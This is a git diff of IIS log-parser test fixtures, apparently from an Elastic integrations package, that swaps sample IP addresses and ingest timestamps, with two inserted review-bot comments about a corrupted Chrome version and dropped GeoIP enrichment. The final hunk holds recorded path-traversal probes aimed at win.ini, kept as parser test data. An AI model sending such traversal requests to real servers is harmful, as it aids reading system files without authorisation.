-2020-10-07 23:06:42 192.168.16.11 GET 
/Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 60 192.168.198.23
-2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 72 192.168.198.23
-2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 88 192.168.198.23
-2020-10-07 23:07:02 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/attachDoc - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 286 192.168.198.23
\ No newline at end of file
+2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 26 192.168.198.23
+2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 
https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23
+2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 46 192.168.198.23
+2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLAPAprvMaster $filter=BatchId%20eq%20%27FY21HSNG0820%27&$orderby=Subsys,Ref&$skip=0&$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23
+2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLATrnsDetail $filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27&$orderby=RecNo&$skip=0&$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 166 192.168.198.23
+2020-10-07 23:06:42 192.168.16.11 GET /Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 60 192.168.198.23
+2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 
72 192.168.198.23
+2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 88 192.168.198.23
+2020-10-07 23:07:02 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/attachDoc - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 286 192.168.198.23
\ No newline at end of file
diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json
index 2787e466725..23aa1ecfdc8 100644
--- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json
+++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json
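Review bot: The substitution in this hunk hit the Chrome build number inside the User-Agent (`Chrome/85.0.4183.121` became `Chrome/67.43.156.13`) rather than any client address; `85.0.4183.121` was never a routable IP (its third octet exceeds 255), and every real address on these lines (192.168.16.11, 192.168.7.63, 192.168.198.23) is RFC 1918 and was left as is. The new fixture therefore carries a nonsensical browser version, and the expected-output hunks that follow for test-x-forward-for.log-expected.json pin `user_agent.version` to `"67.43.156.13"`, so the user-agent parsing path is now asserted against corrupted input. Suggest restoring `Chrome/85.0.4183.121` on all nine added lines and reverting the matching `user_agent.original` and `user_agent.version` values in the expected file; the replacement script presumably matched any dotted quad and would need a per-octet bound before treating one as an address.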
@@ -48,8 +48,8 @@
 },
 "event": {
 "duration": 26000000,
- "ingested": "2021-06-09T11:14:32.323369700Z",
- "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 26 192.168.198.23",
+ "ingested": "2021-12-09T13:39:36.546140500Z",
+ "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 26 192.168.198.23",
 "kind": "event",
 "category": [
 "web",
@@ -62,7 +62,7 @@
 },
 "user_agent": {
 "name": "Chrome",
- "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
+ "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36",
 "os": {
 "name": "Windows",
 "version": "10",
@@ -71,7 +71,7 @@
 "device": {
 "name": "Other"
 },
- "version": "85.0.4183.121"
+ "version": "67.43.156.13"
 }
 },
 {
@@ -122,8 +122,8 @@
 },
 "event": {
 "duration": 32000000,
- "ingested": "2021-06-09T11:14:32.323391200Z",
- "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23",
+ "ingested": "2021-12-09T13:39:36.546153400Z",
+ "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23",
 "kind": "event",
 "category": [
 "web",
@@ -136,7 +136,7 @@
 },
 "user_agent": {
 "name": "Chrome",
- "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
+ "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36",
 "os": {
 "name": "Windows",
 "version": "10",
@@ -145,7 +145,7 @@
 "device": {
 "name": "Other"
 },
- "version": "85.0.4183.121"
+ "version": "67.43.156.13"
 }
 },
 {
@@ -196,8 +196,8 @@
 },
 "event": {
 "duration": 46000000,
- "ingested": "2021-06-09T11:14:32.323396700Z",
- "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 46 192.168.198.23",
+ "ingested": "2021-12-09T13:39:36.546173100Z",
+ "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 46 192.168.198.23",
 "kind": "event",
 "category": [
 "web",
@@ -210,7 +210,7 @@
 },
 "user_agent": {
 "name": "Chrome",
- "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
+ "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36",
 "os": {
 "name": "Windows",
 "version": "10",
@@ -219,7 +219,7 @@
 "device": {
 "name": "Other"
 },
- "version": "85.0.4183.121"
+ "version": "67.43.156.13"
 }
 },
 {
@@ -271,8 +271,8 @@
 },
 "event": {
 "duration": 32000000,
- "ingested": "2021-06-09T11:14:32.323401200Z",
- "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLAPAprvMaster $filter=BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=Subsys,Ref\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23",
+ "ingested": "2021-12-09T13:39:36.546192Z",
+ "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLAPAprvMaster $filter=BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=Subsys,Ref\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23",
 "kind": "event",
 "category": [
 "web",
@@ -285,7 +285,7 @@
 },
 "user_agent": {
 "name": "Chrome",
- "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
+ "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36",
 "os": {
 "name": "Windows",
 "version": "10",
@@ -294,7 +294,7 @@
 "device": {
 "name": "Other"
 },
- "version": "85.0.4183.121"
+ "version": "67.43.156.13"
 }
 },
 {
@@ -346,8 +346,8 @@
 },
 "event": {
 "duration": 166000000,
- "ingested": "2021-06-09T11:14:32.323405100Z",
- "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLATrnsDetail $filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=RecNo\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 166 192.168.198.23",
+ "ingested": "2021-12-09T13:39:36.546201100Z",
+ "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLATrnsDetail $filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=RecNo\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 166 192.168.198.23",
 "kind": "event",
 "category": [
 "web",
@@ -360,7 +360,7 @@
 },
 "user_agent": {
 "name": "Chrome",
- "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
+ "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36",
 "os": {
 "name": "Windows",
 "version": "10",
@@ -369,7 +369,7 @@
 "device": {
 "name": "Other"
 },
- "version": "85.0.4183.121"
+ "version": "67.43.156.13"
 }
 },
 {
@@ -420,8 +420,8 @@
 },
 "event": {
 "duration": 60000000,
- "ingested": "2021-06-09T11:14:32.323408800Z",
- "original": "2020-10-07 23:06:42 192.168.16.11 GET /Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 60 192.168.198.23",
+ "ingested": "2021-12-09T13:39:36.546217700Z",
+ "original": "2020-10-07 23:06:42 192.168.16.11 GET /Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 60 192.168.198.23",
 "kind": "event",
 "category": [
 "web",
@@ -434,7 +434,7 @@
 },
 "user_agent": {
 "name": "Chrome",
- "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
+ "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36",
 "os": {
 "name": "Windows",
 "version": "10",
@@ -443,7 +443,7 @@
 "device": {
 "name": "Other"
 },
- "version": "85.0.4183.121"
+ "version": "67.43.156.13"
 }
 },
 {
@@ -494,8 +494,8 @@
 },
 "event": {
 "duration": 72000000,
- "ingested": "2021-06-09T11:14:32.323412900Z",
- "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 72 192.168.198.23",
+ "ingested": "2021-12-09T13:39:36.546240Z",
+ "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 72 192.168.198.23",
 "kind": "event",
 "category": [
 "web",
@@ -508,7 +508,7 @@
 },
 "user_agent": {
 "name": "Chrome",
- "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
+ "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36",
 "os": {
 "name": "Windows",
 "version": "10",
@@ -517,7 +517,7 @@
 "device": {
 "name": "Other"
 },
- "version": "85.0.4183.121"
+ "version": "67.43.156.13"
 }
 },
 {
@@ -568,8 +568,8 @@
 },
 "event": {
 "duration": 88000000,
- "ingested": "2021-06-09T11:14:32.323416800Z",
- "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 88 192.168.198.23",
+ "ingested": "2021-12-09T13:39:36.546248800Z",
+ "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 88 192.168.198.23",
 "kind": "event",
 "category": [
 "web",
@@ -582,7 +582,7 @@
 },
 "user_agent": {
 "name": "Chrome",
- "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
+ "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36",
 "os": {
 "name": "Windows",
 "version": "10",
@@ -591,7 +591,7 @@
 "device": {
 "name": "Other"
 },
- "version": "85.0.4183.121"
+ "version": "67.43.156.13"
 }
 },
 {
@@ -642,8 +642,8 @@
 },
 "event": {
 "duration": 286000000,
- "ingested": "2021-06-09T11:14:32.323427300Z",
- "original": "2020-10-07 23:07:02 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/attachDoc - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 286 192.168.198.23",
+ "ingested": "2021-12-09T13:39:36.546255Z",
+ "original": "2020-10-07 23:07:02 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/attachDoc - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 286 192.168.198.23",
 "kind": "event",
 "category": [
 "web",
@@ -656,7 +656,7 @@
 },
 "user_agent": {
 "name": "Chrome",
- "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
+ "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36",
 "os": {
 "name": "Windows",
 "version": "10",
@@ -665,7 +665,7 @@
 "device": {
 "name": "Other"
 },
- "version": "85.0.4183.121"
+ "version": "67.43.156.13"
 }
 }
 ]
diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log
index 21158a4d4e6..32b301c2743 100644
--- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log
+++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log
@@ -1,4 +1,4 @@
 2018-01-01 08:09:10 172.31.77.6 2094 172.31.77.6 80 HTTP/1.1 GET /qos/1kbfile.txt 503 - ConnLimit -
-2018-01-01 09:10:11 85.181.35.98 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -
-2018-01-01 10:11:12 85.181.35.98 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -
-2018-01-01 11:12:13 85.181.35.98 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -
+2018-01-01 09:10:11 67.43.156.13 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -
+2018-01-01 10:11:12 67.43.156.13 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -
+2018-01-01 11:12:13 67.43.156.13 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -
diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json
index 6826d7c8f9f..567c09487cc 100644
--- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json
+++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json
@@ -44,7 +44,7 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T11:14:32.576466500Z",
+ "ingested": "2021-12-09T13:39:38.169719300Z",
 "original": "2018-01-01 08:09:10 172.31.77.6 2094 172.31.77.6 80 HTTP/1.1 GET /qos/1kbfile.txt 503 - ConnLimit -",
 "category": [
 "web",
@@ -64,27 +64,9 @@
 "ip": "127.0.0.1"
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "DE-BE",
- "city_name": "Berlin",
- "country_iso_code": "DE",
- "country_name": "Germany",
- "region_name": "Land Berlin",
- "location": {
- "lon": 13.4531,
- "lat": 52.4473
- }
- },
- "as": {
- "number": 6805,
- "organization": {
- "name": "Telefonica Germany"
- }
- },
- "address": "85.181.35.98",
 "port": 2780,
- "ip": "85.181.35.98"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "url": {
 "path": "/ThisIsMyUrl.htm",
@@ -105,7 +87,7 @@
 },
 "related": {
 "ip": [
- "85.181.35.98",
+ "67.43.156.13",
 "127.0.0.1"
 ]
 },
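Review bot: In the `@@ -64,27 +64,9 @@` hunk of test-iis-error-72.log-expected.json the new document drops `source.geo` and `source.as` entirely instead of carrying the enrichment for the replacement address, so after this change the error data stream's pipeline test no longer checks the GeoIP/AS lookup on `source.ip` at all; the same removal repeats in the `@@ -139,27 +121,9 @@` and `@@ -228,31 +192,13 @@` hunks that follow. If the 67.43.156.0/24 addresses are meant to resolve in the test GeoIP database, the expected file should contain the new `geo`/`as` block for 67.43.156.13 rather than none; if they are not, the loss of enrichment coverage deserves a sentence in the PR description. A silently vanishing enrichment block is the kind of regression this fixture exists to catch, so it should not pass review as a by-product of an IP swap.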
@@ -119,8 +101,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T11:14:32.576489Z",
- "original": "2018-01-01 09:10:11 85.181.35.98 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -",
+ "ingested": "2021-12-09T13:39:38.169724100Z",
+ "original": "2018-01-01 09:10:11 67.43.156.13 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -",
 "category": [
 "web",
 "network"
@@ -139,27 +121,9 @@
 "ip": "127.0.0.1"
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "DE-BE",
- "city_name": "Berlin",
- "country_iso_code": "DE",
- "country_name": "Germany",
- "region_name": "Land Berlin",
- "location": {
- "lon": 13.4531,
- "lat": 52.4473
- }
- },
- "as": {
- "number": 6805,
- "organization": {
- "name": "Telefonica Germany"
- }
- },
- "address": "85.181.35.98",
 "port": 2894,
- "ip": "85.181.35.98"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "url": {
 "path": "/",
@@ -179,7 +143,7 @@
 },
 "related": {
 "ip": [
- "85.181.35.98",
+ "67.43.156.13",
 "127.0.0.1"
 ]
 },
@@ -193,8 +157,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T11:14:32.576494100Z",
- "original": "2018-01-01 10:11:12 85.181.35.98 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -",
+ "ingested": "2021-12-09T13:39:38.169727800Z",
+ "original": "2018-01-01 10:11:12 67.43.156.13 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -",
 "category": [
 "web",
 "network"
@@ -218,7 +182,7 @@
 },
 "related": {
 "ip": [
- "85.181.35.98",
+ "67.43.156.13",
 "127.0.0.1"
 ]
 },
@@ -228,31 +192,13 @@ "ip": "127.0.0.1" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", "port": 64388, - "ip": "85.181.35.98" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T11:14:32.576498500Z", - "original": "2018-01-01 11:12:13 85.181.35.98 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -", + "ingested": "2021-12-09T13:39:38.169731300Z", + "original": "2018-01-01 11:12:13 67.43.156.13 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -", "category": [ "web", "network" diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log index 12b3262a924..eea55dbb221 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log 
@@ -1,8 +1,8 @@
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /..\pixfir~1\how_to_login.html 403 - Forbidden -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ..\..\..\..\..\..\winnt\win.ini 400 - URL -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\..\..\..\..\..\..\winnt\win.ini 403 - Forbidden -
-2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -
